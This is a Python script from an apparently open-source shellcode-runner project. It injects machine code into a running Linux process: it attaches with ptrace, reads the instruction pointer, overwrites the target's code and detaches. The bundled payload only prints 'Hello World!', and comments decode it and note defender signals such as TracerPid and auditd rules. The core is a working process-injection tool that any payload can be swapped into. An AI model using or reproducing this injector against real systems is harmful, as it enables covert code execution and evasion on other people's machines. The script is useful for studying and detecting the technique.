#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###################
# This repository implements multiples way to execute
# shellcode with different platforms, systems and languages.
# Copyright (C) 2023 Maurice Lambert
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
###################
"""
This repository implements multiples way to execute
shellcode with different platforms, systems and languages.
To exploit process injection on Linux the target process must be PTRACER.
from ctypes import cdll, c_ulong
libc = cdll.LoadLibrary("libc.so.6")
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = c_ulong(-1)
libc.prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY)
"""
__version__ = "0.0.1"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This repository implements multiples way to execute
shellcode with different platforms, systems and languages.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/ShellcodeRunners"
copyright = """
ShellcodeRunners Copyright (C) 2023 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright
__all__ = []
print(copyright)
from ctypes import cdll, c_char_p, c_ulonglong, c_void_p
from sys import argv, stderr, exit
# --- command-line handling ---------------------------------------------------
# Exactly one argument, the target pid, is accepted; anything else prints the
# usage line to stderr and exits with status 1. A non-numeric argument is not
# caught here: int() raises ValueError and the script dies with a traceback.
if len(argv) != 2:
    print(
        "USAGES: python3 shellcode_injection_Linux.py <pid:integer>",
        file=stderr,
    )
    exit(1)

pid = int(argv[1])

# ptrace() and waitpid() are called through libc with ctypes' default
# signatures (C int arguments, int return value). That is why the 64-bit
# address and data words further down are wrapped explicitly in c_void_p /
# c_ulonglong; the pid and request numbers fit in a C int as-is.
libc = cdll.LoadLibrary("libc.so.6")

# Sample payload, x86-64 machine code. Decoded, the bytes are:
#   mov rax, "rld!\n\0\0\0" ; push rax
#   mov rax, "Hello Wo"     ; push rax          -> "Hello World!\n" on the stack
#   mov rdi, 1 ; mov rsi, rsp ; mov rdx, 13 ; mov rax, 1 ; syscall
# i.e. write(1, "Hello World!\n", 13). Nothing follows the syscall, so the
# target goes on to execute whatever bytes lie after the written words.
# The payload is 48 bytes, a multiple of the 8-byte word PTRACE_POKETEXT
# writes; a payload whose length is not a multiple of 8 would have its last
# word zero-padded by int.from_bytes() in the loop below.
shellcode = (
    b"\x48\xb8\x72\x6c\x64\x21\x0a\x00\x00\x00\x50\x48\xb8\x48\x65\x6c"
    b"\x6c\x6f\x20\x57\x6f\x50\x48\xc7\xc7\x01\x00\x00\x00\x48\x89\xe6"
    b"\x48\xc7\xc2\x0d\x00\x00\x00\x48\xc7\xc0\x01\x00\x00\x00\x0f\x05"
)

# PTRACE_ATTACH (request 16): makes this process the target's tracer and
# stops the target with SIGSTOP. Any non-zero return is treated as failure
# (ptrace returns -1 when the caller lacks ptrace permission over the target
# or Yama ptrace_scope forbids the attach -- see the module docstring).
# This is the observable step for a defender: the ptrace syscall can be
# audited (e.g. an auditd syscall rule), and the target's
# /proc/<pid>/status "TracerPid" field is non-zero while attached.
if libc.ptrace(16, pid, None, None):
    print("ptrace attach failed", file=stderr)
    exit(2)

# Block until the attach-induced stop is reported; waitpid returns the pid on
# success. The status pointer is NULL, so the stop reason is not inspected.
if libc.waitpid(pid, None, 0) != pid:
    print("wait pid failed", file=stderr)
    exit(3)

# PTRACE_GETREGS (request 12) fills a struct user_regs_struct, which on x86-64
# is 27 unsigned 64-bit fields (216 bytes). The buffer is a c_char_p over an
# immutable bytes object that the kernel overwrites in place, and the result
# is then read back through ``_objects`` -- a private ctypes attribute, not a
# stable interface; this is the most fragile part of the script.
registers = c_char_p((b"\0" * 8) * 27)
if libc.ptrace(12, pid, None, registers):
    print("ptrace get registers failed", file=stderr)
    exit(4)

# Field 16 of user_regs_struct on x86-64 is rip (after r15..r8, rax, rcx, rdx,
# rsi, rdi and orig_rax).
rip = int.from_bytes(registers._objects[16 * 8 : 17 * 8], byteorder="little")
# The +2 offset is not explained by the author; presumably it allows for the
# kernel rewinding rip by the length of a ``syscall`` instruction when it
# restarts a system call that the attach stop interrupted -- TODO confirm.
rip += 2

# PTRACE_POKETEXT (request 4) writes one 8-byte word per call at the given
# address. The original instructions at rip are overwritten and never saved,
# so the target cannot resume its normal work afterwards: a process that
# crashes or misbehaves immediately after a ptrace attach is the forensic
# signature of this technique.
while shellcode:
    if libc.ptrace(
        4,
        pid,
        c_void_p(rip),
        c_ulonglong(int.from_bytes(shellcode[:8], byteorder="little")),
    ):
        print("ptrace write data failed", file=stderr)
        exit(5)
    shellcode = shellcode[8:]
    rip += 8

# PTRACE_DETACH (request 17) resumes the target; it continues from the
# (now rewritten) instruction stream.
if libc.ptrace(17, pid, None, None):
    print("ptrace detach failed", file=stderr)
    exit(6)

exit(0)